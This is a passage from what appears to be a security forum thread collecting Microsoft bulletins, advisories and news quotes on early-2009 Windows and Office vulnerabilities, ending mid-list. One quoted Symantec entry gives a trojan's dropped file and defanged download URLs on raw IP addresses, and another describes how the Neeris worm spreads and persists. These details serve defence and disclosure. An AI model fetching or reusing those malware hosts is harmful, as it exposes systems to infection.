- http://atlas.arbor.net/briefs/
February 23, 2009 - "...key issues to address for -all- users of IE7. We have seen this used in targeted attacks and now exploit kits that target indiscriminately."
* http://www.microsoft.com/technet/security/bulletin/ms09-002.mspx

:fear::mad:

FYI...

Microsoft Security Advisory (968272)
Vulnerability in Microsoft Office Excel Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/968272.mspx
February 24, 2009 - "Microsoft is investigating new public reports of a vulnerability in Microsoft Office Excel that could allow remote code execution if a user opens a specially crafted Excel file. At this time, we are aware only of limited and targeted attacks that attempt to use this vulnerability...
• Users who have installed and are using the Office Document Open Confirmation Tool* for Office 2000 will be prompted with Open, Save, or Cancel before opening a document.
* http://www.microsoft.com/downloads/details.aspx?familyid=8B5762D2-077F-4031-9EE6-C9538E9F2A2F

- http://www.securityfocus.com/bid/33870/exploit
"Symantec has detected active in-the-wild exploit attempts. This issue is detected as 'Trojan.Mdropper.AC'**

Trojan.Mdropper.AC
** http://preview.tinyurl.com/dbz42c
Updated: February 24, 2009 - "Systems Affected: Windows Vista, Windows XP
When the Trojan executes, it may exploit the Microsoft Excel Unspecified Remote Code Execution Vulnerability (BID 33870).
It then drops the following file: %Temp%\rundll.exe (a copy of Downloader)
The Trojan may then attempt to download more files on to the compromised computer from the following locations:
* [http://]61. 59.24.55 /sb.php?id=[19 RANDOM ASCII CHARACTERS]
* [http://]61. 59.24.45 /sb.php?id=[19 RANDOM ASCII CHARACTERS]
* [http://]61. 221.40.63 /sb.php?id=[19 RANDOM ASCII CHARACTERS] ..."

:fear::fear:

FYI...

MS AutoRun fix for XP, W2K, W2K3 released...
- http://preview.tinyurl.com/cqtxcd
February 24, 2009 Computerworld - "Microsoft is pushing out a software update to some Windows users that fixes a bug in the Windows AutoRun software, used to automatically launch programs when DVDs or USB devices are introduced to the PC... the widespread Conficker worm uses AutoRun to spread from USB devices to PCs... (MS) had also pushed out a July update that fixed the problem for Vista and Server 2008*; but this fix** was -not- automatically updated for Windows 2000, XP and Server 2003 users..."

* http://www.microsoft.com/technet/security/Bulletin/MS08-038.mspx

How to correct "disable Autorun registry key" enforcement in Windows
** http://support.microsoft.com/kb/967715
February 24, 2009

- http://isc.sans.org/diary.html?storyid=5938
Last Updated: 2009-02-26 20:46:47 UTC ...(Version: 2)
"...XP home can't run gpedit.msc. XP home users need to follow the "How to selectively disable specific autorun features" steps. I recommend you modify the NoDriveTypeAutoRun value to 0xFF. That should disable autorun on ALL drives."

:fear::fear:

FYI...

Microsoft Security Advisory (967940)
Update for Windows Autorun
- http://www.microsoft.com/technet/security/advisory/967940.mspx
02/24/2009 - "Microsoft is announcing the availability of an update that corrects a functionality feature that can help customers in keeping their systems protected. The update corrects an issue that prevents the NoDriveTypeAutoRun registry key from functioning as expected. When functioning as expected, the NoDriveTypeAutoRun registry key can be used to selectively disable Autorun functionality (e.g. AutoPlay, double click, and contextual menu features associated with Autorun) for drives on a user's system and network. Disabling Autorun functionality can help protect customers from attack vectors that involve the execution of arbitrary code by Autorun when inserting a CD-ROM device, USB device, network shares, or other media containing a file system with an Autorun.inf file. We encourage Windows customers to review and install this update. This update is available through automatic updating and from the download center. For more information about this issue, including download links for this non-security update, see Microsoft Knowledge Base Article 967715*."
* http://support.microsoft.com/kb/967715

:fear::fear:

FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS09-mar.mspx
March 10, 2009 - "This bulletin summary lists security bulletins released for March 2009...

Critical -1-

Microsoft Security Bulletin MS09-006 – Critical
Vulnerabilities in Windows Kernel Could Allow Remote Code Execution (958690)
- http://www.microsoft.com/technet/security/bulletin/MS09-006.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...
Executive Summary: This security update resolves several privately reported vulnerabilities in the Windows kernel. The most serious vulnerability could allow remote code execution if a user viewed a specially crafted EMF or WMF image file from an affected system. This security update is rated Critical for all supported editions of Microsoft Windows 2000, Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008...
CVE-2009-0081, CVE-2009-0082, CVE-2009-0083

Important -2-

Microsoft Security Bulletin MS09-007 - Important
Vulnerability in SChannel Could Allow Spoofing (960225)
- http://www.microsoft.com/technet/security/bulletin/MS09-007.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...
Executive Summary: This security update resolves a privately reported vulnerability in the Secure Channel (SChannel) security package in Windows. The vulnerability could allow spoofing if an attacker gains access to the certificate used by the end user for authentication. Customers are only affected when the public key component of the certificate used for authentication has been obtained by the attacker through other means. This security update is rated Important for all supported editions of Microsoft Windows 2000, Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008...
CVE-2009-0085

Microsoft Security Bulletin MS09-008 – Important
Vulnerabilities in DNS and WINS Server Could Allow Spoofing (962238)
- http://www.microsoft.com/technet/security/bulletin/MS09-008.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...
Executive Summary: This security update resolves two privately reported vulnerabilities and two publicly disclosed vulnerabilities in Windows DNS server and Windows WINS server. These vulnerabilities could allow a remote attacker to redirect network traffic intended for systems on the Internet to the attacker’s own systems. This security update is rated Important for all supported editions of Microsoft Windows 2000 Server, Windows Server 2003, and Windows Server 2008...
CVE-2009-0093, CVE-2009-0094, CVE-2009-0233, CVE-2009-0234
___

Malicious Software Removal Tool
- http://www.microsoft.com/security/malwareremove/default.mspx
File Name: windows-kb890830-v2.8.exe
Version: 2.8
Knowledge Base (KB) Articles: http://support.microsoft.com/?kbid=890830
Date Published: 3/10/2009
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=5995
Last Updated: 2009-03-10 17:48:31 UTC

Revised...

Microsoft Security Bulletin MS08-052 – Critical
Vulnerabilities in GDI+ Could Allow Remote Code Execution (954593)
- http://www.microsoft.com/technet/security/bulletin/ms08-052.mspx
Updated: March 10, 2009
• V4.0 (March 10, 2009): Added entry in the Frequently Asked Questions (FAQ) Related to this Security Update section to communicate the rerelease of the update packages for Windows XP Service Pack 3 and Windows Server 2003 Service Pack 2 to fix an installation issue. Customers who have already successfully installed the original updates for Windows XP Service Pack 3 or Windows Server 2003 Service Pack 2 do not need to reinstall the new updates.

:fear:

FYI...

- http://isc.sans.org/diary.html?storyid=6010
Last Updated: 2009-03-13 03:07:43 UTC - "...Microsoft should really fix this vulnerability and pay more attention to local privilege escalation vulnerabilities. While MS released an advisory with suggested workarounds (available at http://www.microsoft.com/technet/security/advisory/951306.mspx *), I don’t think enough people know about this..."
* Microsoft Security Advisory (951306)
Vulnerability in Windows Could Allow Elevation of Privilege...
Revisions:
• April 17, 2008: Advisory published
• April 23, 2008: Added clarification to impact of workaround for IIS 6.0
• August 27, 2008: Added Windows XP Professional Service Pack 3 as affected software.
• October 9, 2008: Added information regarding the public availability of exploit code.

:fear::fear:

FYI...

Microsoft Security Advisory (969136)
Vulnerability in Microsoft Office PowerPoint Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/969136.mspx
April 2, 2009 - "Microsoft is investigating new reports of a vulnerability in Microsoft Office PowerPoint that could allow remote code execution if a user opens a specially crafted PowerPoint file. At this time, we are aware only of limited and targeted attacks that attempt to use this vulnerability... Microsoft will take the appropriate action to protect our customers, which may include providing a solution through our monthly security update release process, or an out-of-cycle security update, depending on customer needs..."

- http://secunia.com/advisories/34572/
Release Date: 2009-04-03
Critical: Extremely critical
Impact: System access
Where: From remote
Solution Status: Unpatched ...

- http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0556

:fear:

FYI...

New exploit of MS08-067
- http://blogs.technet.com/mmpc/archive/2009/04/03/a-new-exploit-of-ms08-067-has-been-identified.aspx
April 03, 2009 - "... We have found a new exploit of MS08-067 other than Conficker. We also discovered that we already detected and protected users against this new malware... Neeris is a worm that has been active for a few years. Some of its variants used to exploit MS06-040 which addressed a vulnerability in the same Server service as MS08-067. However it looks like the authors of Neeris have been taking notes from Conficker. A new variant of the Neeris worm has been launched this week. It has some interesting similarities to Conficker:
• The new variant of Neeris has been updated to exploit MS08-067. Also, after the successful exploitation, the victim machine downloads a copy of the worm from the attacking machine using HTTP.
• Neeris spreads via autorun. The new Neeris variant even adds the same ‘Open folder to view files’ AutoPlay option that Conficker does.
• Neeris uses a driver to patch the TCP/IP layer of the system in order to remove the outgoing connection limits from XPSP2 ...
The file names that this malware uses are deceptive. Most commonly we saw it using the name “Netmon.exe” but it sometimes masquerades itself as a SCR file with names that follow the pattern <two digits.scr>. It also drops a copy of itself using the file name smartkey.exe. Even its image time stamp is bogus: 6/19/1992 10:22:17 PM. The malware adds itself to start every time Windows starts and even adds itself to the Safe Boot configuration.
Due to the similarities to Conficker, most of the mitigations that were mentioned also apply here: make sure to install MS08-067 if you haven’t done so yet and be careful to use only AutoPlay options you’re familiar with or consider disabling the Autorun altogether. Other mitigations and information are available in our write up at Worm:Win32/Neeris.gen!C *..."
* http://www.microsoft.com/security/portal/Entry.aspx?Name=Worm%3aWin32%2fNeeris.gen!C

:fear::fear:

FYI...

- http://www.wservernews.com/
Apr. 10, 2009 - "Next Tuesday (14-Apr-2009), Redmond will no longer offer mainstream support for a bunch of Service Packs flavors, WinXP (Service Pack 0) and W2K3 SP1 among them. They said they will continue to provide free security fixes for XP until 2014. Windows XP still accounts for about 63 percent of all Internet-connected computers, according to March 2009 statistics from Hitslink, while Windows Vista makes up about 24 percent. Here are the Hitslink market share numbers:
http://marketshare.hitslink.com/operating-system-market-share.aspx?qprid=10
Support for WinXP Service Pack 2 is until July 13, 2010. Existing XP users are encouraged to upgrade to the latest SP3. More about this at the "Windows Service Pack Road Map" at Microsoft:
- http://www.microsoft.com/windows/lifecycle/servicepacks.mspx ...
... list of products and versions where the support will end on April 14, 2009...
- http://preview.tinyurl.com/s870 ..."

:lip:

FYI...

- http://preview.tinyurl.com/cj5b73
April 10, 2009 IEBlog - "... Starting on or about the third week of April, users still running IE6 or IE7 on Windows XP, Windows Vista, Windows Server 2003, or Windows Server 2008 will get will get a notification through Automatic Update about IE8. This rollout will start with a narrow audience and expand over time to the entire user base. On Windows XP and Server 2003, the update will be High-Priority. On Windows Vista and Server 2008 it will be Important. IE8 will not automatically install on machines. Users must opt-in to install IE8. Users will see a Welcome screen that offers choices: Ask later, install now, or don’t install. Users who decline the automatic update can still download it from http://www.microsoft.com/ie8 or from Windows Update as an optional update... If an organization uses Automatic Update to keep Windows up-to-date but wants to manage its own deployment of IE8, a free Blocker Toolkit* is available that will block automatic delivery of IE8. This blocker toolkit was released in January 2009 and has no expiration date..."
* http://preview.tinyurl.com/9yjpqw

:spider::buried:

FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS09-apr.mspx?pf=true
April 14, 2009 - "This bulletin summary lists security bulletins released for April 2009... (Total of -8- )

Critical (5)

Microsoft Security Bulletin MS09-009
Vulnerabilities in Microsoft Office Excel Could Cause Remote Code Execution (968557)
- http://www.microsoft.com/technet/security/bulletin/MS09-009.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office...

Microsoft Security Bulletin MS09-010
Vulnerabilities in WordPad and Office Text Converters Could Allow Remote Code Execution (960477)
- http://www.microsoft.com/technet/security/bulletin/MS09-010.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows, Microsoft Office...

Microsoft Security Bulletin MS09-011
Vulnerability in Microsoft DirectShow Could Allow Remote Code Execution (961373)
- http://www.microsoft.com/technet/security/bulletin/MS09-011.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-013
Vulnerabilities in Windows HTTP Services Could Allow Remote Code Execution (960803)
- http://www.microsoft.com/technet/security/bulletin/MS09-013.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-014
Cumulative Security Update for Internet Explorer (963027)
- http://www.microsoft.com/technet/security/bulletin/MS09-014.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows, Internet Explorer...

Important (2)

Microsoft Security Bulletin MS09-012
Vulnerabilities in Windows Could Allow Elevation of Privilege (959454)
- http://www.microsoft.com/technet/security/bulletin/MS09-012.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-016
Vulnerabilities in Microsoft ISA Server and Forefront Threat Management Gateway (Medium Business Edition) Could Cause Denial of Service (961759)
- http://www.microsoft.com/technet/security/bulletin/MS09-016.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Denial of Service
Restart Requirement: Requires restart
Affected Software: Microsoft Forefront Edge Security...

Moderate (1)

Microsoft Security Bulletin MS09-015
Blended Threat Vulnerability in SearchPath Could Allow Elevation of Privilege (959426)
- http://www.microsoft.com/technet/security/bulletin/MS09-015.mspx
Maximum Severity Rating: Moderate
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

- http://blogs.technet.com/msrc/archive/2009/04/14/april-2009-monthly-bulletin-release.aspx
April 14, 2009
___

MSRT - April 2009
- http://support.microsoft.com/?kbid=890830
April 14, 2009 - Revision: 58.0
(Recent adds)
Win32/Conficker - January 2009 (V 2.6) High
Win32/Srizbi - February 2009 (V 2.7) Moderate
Win32/Koobface - March 2009 (V 2.8) Moderate
Win32/Waledac - April 2009 (V 2.9) Moderate
Download: http://preview.tinyurl.com/6bb67
___

ISC Analysis (includes CVE links)
- http://isc.sans.org/diary.html?storyid=6193
Last Updated: 2009-04-15 02:14:16 UTC ...
___

- http://preview.tinyurl.com/cnylhb
April 14, 2009 (Computerworld) - 10 of the 23 vulnerabilities have already been exploited or are public...

.

FYI...

Microsoft Security Advisory (968272)
Vulnerability in Microsoft Office Excel Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/968272.mspx
Published: February 24, 2009 | Updated: April 14, 2009 - "... We have issued MS09-009 to address this issue..."
- http://www.microsoft.com/technet/security/bulletin/MS09-009.mspx

Microsoft Security Advisory (960906)
Vulnerability in WordPad Text Converter Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/960906.mspx
Published: December 9, 2008 | Updated: April 14, 2009 - "... We have issued MS09-010 to address this issue..."
- http://www.microsoft.com/technet/security/bulletin/MS09-010.mspx

Microsoft Security Advisory (953818)
Blended Threat from Combined Attack Using Apple’s Safari on the Windows Platform
- http://www.microsoft.com/technet/security/advisory/953818.mspx
Published: May 30, 2008 | Updated: April 14, 2009 - "... Customers running Safari on Windows should review this advisory. We have issued Microsoft Security Bulletin MS09-014, Cumulative Security Update for Internet Explorer (963027), and MS09-015, Blended Threat Vulnerability in SearchPath Could Allow Elevation of Privilege (959426), to address this issue. For more information about this issue, including download links for security updates, please review MS09-014 and MS09-015.
- http://www.microsoft.com/technet/security/Bulletin/ms09-014.mspx
- http://www.microsoft.com/technet/security/Bulletin/ms09-015.mspx
Apple Support has released a security advisory that addresses the vulnerability in Apple’s Safari 3.1.2 for Windows. Please see Apple security advisory About the security content of Safari 3.1.2 for Windows for more information.
- http://support.apple.com/kb/HT2092
Mitigating Factors:
• Customers who have changed the default location where Safari downloads content to the local drive are not affected by this blended threat..."

Microsoft Security Advisory (951306)
Vulnerability in Windows Could Allow Elevation of Privilege
- http://www.microsoft.com/technet/security/advisory/951306.mspx
Published: April 17, 2008 | Updated: April 14, 2009 - "... We have issued MS09-012 to address this issue..."
- http://www.microsoft.com/technet/security/Bulletin/ms09-012.mspx

:fear:

FYI...

IEv8 now pushed...
- http://isc.sans.org/diary.html?storyid=6283
Last Updated: 2009-04-28 23:55:01 UTC - "If you were to go to your "Windows Update..." feature today, you will see that IE8 is now available as a "critical" update to your Microsoft OS..."

Internet Explorer 8 for Windows XP
Date last published: 4/28/2009
Download size: 16.1 MB

:lip:

FYI...

MS Office 2007 SP2 released
- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=217200466
April 28, 2009 - "The productivity suite update adds built-in support for Open Document Format and a slew of other tweaks, including improved Outlook performance... The new service pack became available as a manual download* Tuesday. It won't become an automatic update for another 90 days, and then only with a 30-day notice."
* http://preview.tinyurl.com/cfq34v
Knowledge Base (KB) Articles: http://support.microsoft.com/kb/953195
Date Published: 4/24/2009
290.2 MB

>> Note: Several reports found both the IEv8 and MS Office 2007 SP2 updates available on the MS Update site.

- http://jkontherun.com/2009/04/30/office-2007-sp2-breaking-corporate-email/
April 30, 2009 - "... a number of corporate users are experiencing a major bug in SP2 that affects the ability to access the Global Address Book, effectively rendering corporate email useless. One corporate user says the problem went away when Office 2007 SP2 was removed..."

:lip:

FYI...

MS Security Bulletin revisions to:

• MS09-012 - Important
- http://www.microsoft.com/technet/security/bulletin/ms09-012.mspx
• -V2.0- (April 29, 2009): Added an entry to the section, Frequently Asked Questions (FAQ) Related to This Security Update to communicate the rerelease of the Norwegian-language update for Microsoft Windows 2000 Service Pack 4 (KB952004). Customers who require the Norwegian-language update need to download and install the rereleased update. No other updates or locales are affected by this rerelease.

• MS08-076 - Important
- http://www.microsoft.com/technet/security/bulletin/ms08-076.mspx
• -V4.0- (April 29, 2009): Added Windows Media Services 2008 (KB952068) on 32-bit and x64-based editions of Windows Server 2008 Service Pack 2 as affected software. Also, added Windows Server 2008 for Itanium-based Systems Service Pack 2 as non-affected software. This is a detection change only; there were no changes to the binaries. Customers who have already successfully installed KB952068 do not need to reinstall.

• MS08-069 - Critical
- http://www.microsoft.com/technet/security/bulletin/ms08-069.mspx
• -V2.0- (April 29, 2009): Added Microsoft XML Core Services 4.0 (KB954430) on 32-bit and x64-based editions of Windows Vista Service Pack 2 and on 32-bit, x64-based, and Itanium-based editions of Windows Server 2008 Service Pack 2 as affected software. Also added as non-affected software: Microsoft XML Core Services 3.0 and Microsoft XML Core Services 6.0 on 32-bit and x64-based editions of Windows Vista Service Pack 2 and on 32-bit, x64-based, and Itanium-based editions of Windows Server 2008 Service Pack 2. This is a detection change only; there were no changes to the binaries. Customers who have already successfully installed KB954430 do not need to reinstall.

:fear:

FYI...

- http://www.microsoft.com/technet/security/bulletin/ms09-may.mspx
May 12, 2009 - "This bulletin summary lists security bulletins released for May 2009...
(Total of -1-)

Critical

Microsoft Security Bulletin MS09-017 - Critical
Vulnerabilities in Microsoft Office PowerPoint Could Allow Remote Code Execution (967340)
- http://www.microsoft.com/technet/security/bulletin/ms09-017.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office...

- http://secunia.com/advisories/32428/2/
Last Update: 2009-05-13
Critical: Highly critical

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0220
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0221
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0222
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0223
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0224
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0225
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0226
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0227
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0556
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1128
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1129
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1130
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1131
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1137
___

MSRT - May 2009
- http://support.microsoft.com/?kbid=890830
May 12, 2009 - Revision: 59.0
(Recent adds)...
Win32/Koobface March 2009 (V 2.8) Moderate
Win32/Waledac April 2009 (V 2.9) Moderate
Win32/Winwebsec May 2009 (V 2.10) Moderate ...
Download: http://preview.tinyurl.com/6bb67
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=6376
Last Updated: 2009-05-12 17:47:16 UTC

FYI...

Microsoft Security Advisory (969136)
Vulnerability in Microsoft Office PowerPoint Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/969136.mspx
Updated: May 12, 2009 - "...We have issued MS09-017* to address this issue..."
* http://www.microsoft.com/technet/security/bulletin/ms09-017.mspx

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0556

// At least one of the vulnerabilities is actively being exploited in the wild.

FYI...

- http://pandalabs.pandasecurity.com/archive/MS08_2D00_066-in-the-wild.aspx
14 May 09 - "... use Windows with a regular user account, in order to avoid most of the malware actions that require admin rights (install rootkits, modify system files, registry or services,…) . However it’s really important to keep our system updated. You should install Windows updates every month because even if your default Windows user hasn’t got admin privileges, you could still have problems if you execute a malware... With this piece of code, if the system hasn’t been updated with the MS08-066* patch, the malware would be able to do whatever it wants..."
* http://www.microsoft.com/technet/security/bulletin/ms08-066.mspx
Vuln in the MS Ancillary Function Driver Could Allow Elevation of Privilege (956803)
... Why was this security bulletin revised on January 13, 2009?
Microsoft revised this security bulletin to announce a detection change for this security update. As a result of the correction, the detection offers the security update to affected systems that previously were not offered this security update....
- http://support.microsoft.com/kb/956803

(More detail available at the PandaLabs URL above.)

:fear::fear:

FYI...

- http://www.symantec.com/security_response/threatconlearn.jsp
May 16, 2009 - "The ThreatCon is currently at Level 2: Elevated... A newly discovered and unpatched flaw has been disclosed affecting Microsoft IIS 6 with WebDAV enabled. Due to an error in the way unicode characters are handled, it is possible for an attacker to bypass authentication requirements when accessing a protected resource. It may also be possible for attackers to upload files to a vulnerable server without supplying credentials. Due to the nature of this flaw and the ease at which it can be triggered, we feel that it is probable that attacks will be carried out in the wild. Reports indicate that Microsoft IIS 7 is not vulnerable. More information is available in the following BID: Microsoft IIS Unicode Requests to WebDAV Multiple Authentication Bypass Vulnerabilities
http://www.securityfocus.com/bid/34993 ..."

- http://isc.sans.org/diary.html?storyid=6397
Last Updated: 2009-05-16 00:05:27 UTC - "... adding certain Unicode characters to an URL makes it possible to bypass authentication in Microsoft IIS6 with WebDav and access or even upload files in folders which are supposed to be password protected... If you have WebDav active and accessible from the Internet on any of your IIS6, it is probably a wise move to hedge and turn WebDav off.."
- http://blog.zoller.lu/2009/05/iis-6-webdac-auth-bypass-and-data.html

- http://secunia.com/advisories/35109/2/
Release Date: 2009-05-18
Critical: Moderately critical
Impact: Security Bypass
Where: From remote
Solution Status: Unpatched
Software: Microsoft Internet Information Services (IIS) 5.x, Microsoft Internet Information Services (IIS) 6
Solution: Do not store sensitive files inside the webroot. Disable WebDAV support...

:fear::fear:

FYI...

Microsoft Security Advisory (971492)
Vulnerability in Internet Information Services Could Allow Elevation of Privilege
- http://www.microsoft.com/technet/security/advisory/971492.mspx
May 18, 2009 - "Microsoft is investigating new public reports of a possible vulnerability in Microsoft Internet Information Services (IIS). An elevation of privilege vulnerability exists in the way that the WebDAV extension for IIS handles HTTP requests. An attacker could exploit this vulnerability by creating a specially crafted anonymous HTTP request to gain access to a location that typically requires authentication. We are not aware of attacks that are trying to use this vulnerability or of customer impact at this time. Microsoft is investigating the public reports...
Workarounds:
- Disable WebDAV...
- Alternate method to disable WebDAV on IIS 5.0 and IIS 5.1...
- Alternate method to disable WebDAV on IIS 5.1 and IIS 6.0...
- Change file system ACLs to deny access to the anonymous user account...

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1676
Last revised: 05/20/2009
CVSS v2 Base Score: 7.6 (HIGH)

> http://blogs.technet.com/srd/archive/2009/05/18/more-information-about-the-iis-authentication-bypass.aspx
May 18, 2009

Understanding Microsoft's KB971492 IIS5/IIS6 WebDAV Vulnerability
- http://unixwiz.net/techtips/ms971492-webdav-vuln.html
26 May 2009

:fear:

FYI...

- http://www.theregister.co.uk/2009/05/20/iis_bug_fells_university_server/
20 May 2009 - "Hackers have wasted no time targeting a gaping hole in Microsoft's Internet Information Services webserver, according to administrators at Ball State University, who say servers that used the program were breached on Monday... On Monday, Microsoft confirmed what it called an "elevation of privilege vulnerability" in versions 5 and 6 of IIS when it runs an extension known as WebDAV. Microsoft said at the time it was unaware of any in-the-wild exploits of the vulnerability. The assessment was at odds with this warning*..."
* http://www.us-cert.gov/current/index.html#microsoft_internet_information_services_iis
updated May 19, 2009 - "... US-CERT is also aware of publicly available exploit code and active exploitation of this vulnerability... note that disabling WebDAV may affect the functionality of other applications such as SharePoint..."

- http://www.theregister.co.uk/2009/05/21/ball_state_retracts/
21 May 2009 - "Network administrators at Ball State University have retracted their claims that a campus website was brought down by a zero-day vulnerability in Microsoft's Internet Information Services webserver... corrects an advisory campus officials issued Tuesday that claimed the breach was the result of someone targeting a vulnerability in versions 5 and 6 of IIS that allows attackers to list, access, and in some cases upload files in a password-protected folders of vulnerable machines. The vulnerability exists when IIS uses the WebDAV protocol. The advisory was featured prominently on the university's website. "Initially, both Microsoft and Ball State suspected the intruder used the WebDAV vulnerability that was made public by Microsoft on May 15," Proudfoot said..."

Corrected CVE:
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1676
Last revised: 05/20/2009
CVSS v2 Base Score: 7.6 (HIGH)

// http://forums.spybot.info/showpost.php?p=312447&postcount=98

FYI...

- http://www.theinquirer.net/inquirer/news/1137482/vista-service-pack-light
26 May 2009 - "... Microsoft has finally released the next official first aid kit for Windows Vista - SP2. If you've been running the BETA of Service Pack 2 that was released last year, then you'll need to uninstall that before installing the official service pack. Plus, you'll also need to have Service Pack 1 installed first. Although the Service Pack hasn't made it to Windows Update yet, you can now grab the official downloads from Microsoft's Download Center. The installer includes Service Pack 2 for both Windows Vista and Windows Server 2008, resulting in a 348.3MB file for 32-bit version - and a 577.4MB file for 64-bit version. Despite the massive file size, however, there's not much to get excited about. The update mainly includes all of the bits and bobs that have been released since Service Pack 1, although this doesn't include Internet Explorer 8..."

- http://technet.microsoft.com/en-us/windows/dd262148.aspx
May 26, 2009

:spider:

FYI...

Microsoft Security Advisory (971778)
Vulnerability in Microsoft DirectShow Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/971778.mspx
May 28, 2009 - "Microsoft is investigating new public reports of a new vulnerability in Microsoft DirectX. The vulnerability could allow remote code execution if user opened a specially crafted QuickTime media file. Microsoft is aware of limited, active attacks that use this exploit code. While our investigation is ongoing, our investigation so far has shown that Windows 2000 Service Pack 4, Windows XP, and Windows Server 2003 are vulnerable; all versions of Windows Vista and Windows Server 2008 are not vulnerable... Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers..."

- http://www.theregister.co.uk/2009/05/28/critical_microsoft_directx_vulnerability/
28 May 2009 22:37 GMT - "... Microsoft has offered several work-arounds until a patch is available. The most straight-forward of them involves visiting this link* and clicking on the "Fix it" icon. (We got an error when using Firefox, but it worked fine with Internet Explorer)..."
* http://support.microsoft.com/kb/971778

> http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1537

- http://secunia.com/advisories/35268/2/
Release Date: 2009-05-29
Critical: Extremely critical
Impact: System access
Where: From remote
Solution Status: Unpatched...
Solution: Disable the parsing of QuickTime content in quartz.dll. Please see the vendor's advisory for more information. Do not browse untrusted websites or follow untrusted links. Do not open untrusted media files...

:fear:

FYI...

Problems confirmed with Vista SP2
- http://windowssecrets.com/comp/090604#known0
2009-06-04

:sad:

FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS09-jun.mspx
June 9, 2009 - "This bulletin summary lists security bulletins released for June 2009... The following table summarizes the security bulletins for this month in order of severity... (Total of -10-)

Critical -6-

Microsoft Security Bulletin MS09-018
Vulnerabilities in Active Directory Could Allow Remote Code Execution (971055)
- http://www.microsoft.com/technet/security/bulletin/MS09-018.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution, Denial of Service
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-022
Vulnerabilities in Windows Print Spooler Could Allow Remote Code Execution (961501)
- http://www.microsoft.com/technet/security/bulletin/MS09-022.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-019
Cumulative Security Update for Internet Explorer (969897)
- http://www.microsoft.com/technet/security/bulletin/MS09-019.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows, Internet Explorer ...
- http://atlas.arbor.net/briefs/
"...major update to IE 6, 7 and 8 for all platforms. This could affect thousands of users and, as we have seen, be used in drive by attacks for years to come. Source: MS09-019 ..."

Microsoft Security Bulletin MS09-027
Vulnerabilities in Microsoft Office Word Could Allow Remote Code Execution (969514)
- http://www.microsoft.com/technet/security/bulletin/MS09-027.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office...

Microsoft Security Bulletin MS09-021
Vulnerabilities in Microsoft Office Excel Could Allow Remote Code Execution (969462)
- http://www.microsoft.com/technet/security/bulletin/MS09-021.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office...

Microsoft Security Bulletin MS09-024
Vulnerability in Microsoft Works Converters Could Allow Remote Code Execution (957632)
